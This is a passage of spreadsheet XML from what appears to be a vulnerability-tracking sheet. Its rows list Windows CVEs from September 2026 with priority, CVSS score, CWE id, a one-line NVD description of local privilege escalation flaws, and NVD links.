      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q895" s="5" t="inlineStr"/>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S895" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68837</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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96" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q896" s="5" t="inlineStr"/>
      <c r="R896" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S896" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K8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97" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q897" s="5" t="inlineStr"/>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S897" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68847</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K898" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q898" s="5" t="inlineStr"/>
      <c r="R898" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S898" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68884</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K89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99" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q899" s="5" t="inlineStr"/>
      <c r="R899" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S899" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68897</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr"/>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q900" s="5" t="inlineStr"/>
      <c r="R900" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S900" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69275</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q901" s="5" t="inlineStr"/>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S901" s="5" t="inlineStr">
        <is>
          <t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69279</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q902" s="5" t="inlineStr"/>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S902" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69280</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr"/>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q903" s="5" t="inlineStr"/>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S903" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69281</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr"/>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q904" s="5" t="inlineStr"/>
      <c r="R904" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S904" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69287</t>
        </is>
      </c>
      <c r="D905" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F905" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K90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05" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q905" s="5" t="inlineStr"/>
      <c r="R905" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S905" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69292</t>
        </is>
      </c>
      <c r="D906" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F906" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q906" s="5" t="inlineStr"/>
      <c r="R906" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S906" s="5" t="inlineStr">
        <is>
          <t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69299</t>
        </is>
      </c>
      <c r="D907" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F907" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q907" s="5" t="inlineStr"/>
      <c r="R907" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S907" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="D908" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F908" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q908" s="5" t="inlineStr"/>
      <c r="R908" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S908" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="D909" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F909" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q909" s="5" t="inlineStr"/>
      <c r="R909" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S909" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="D910" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F910" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K91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10" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q910" s="5" t="inlineStr"/>
      <c r="R910" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S910" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="D911" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F911" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I911" s="5" t="inlineStr"/>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr"/>
      <c r="L911" s="5" t="inlineStr"/>
      <c r="M911" s="5" t="inlineStr"/>
      <c r="N911" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P911" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q911" s="5" t="inlineStr"/>
      <c r="R911" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S911" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D912" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F912" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I912" s="5" t="inlineStr"/>
      <c r="J912" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K91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12" s="5" t="inlineStr"/>
      <c r="M912" s="5" t="inlineStr"/>
      <c r="N912" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O912" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P912" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q912" s="5" t="inlineStr"/>
      <c r="R912" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S912" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
